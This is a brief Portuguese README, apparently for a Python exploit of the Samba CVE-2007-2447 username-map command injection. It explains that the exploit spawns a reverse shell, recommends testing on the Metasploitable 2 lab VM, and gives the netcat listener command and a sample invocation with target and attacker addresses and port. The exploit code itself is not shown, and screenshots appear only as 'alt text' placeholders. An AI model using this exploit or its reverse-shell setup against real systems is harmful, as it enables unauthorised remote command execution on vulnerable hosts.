
Exploit em Python para o CVE-2007-2447 que aciona a injeção de comandos no script de mapeamento de nome de usuário do Samba para abrir um shell reverso em alvos vulneráveis.
Para testar o script, recomendo a máquina virtual "metasploitable 2" disponível aqui. O script exibirá um reverse shell se o exploit funcionar. Para obter a conexão, basta abrir uma sessão netcat como:
netcat -lnvp <port>
py CVE-2007-2447.py 192.168.1.38 1337 192.168.1.14
e no meu netcat :
netcat -lnvp 1337
Resultado:
netcat :
alt text
e no script:
alt text
Usei um payload de uma cheat-sheet. O link está disponível . Você pode substituí-lo por outros payloads.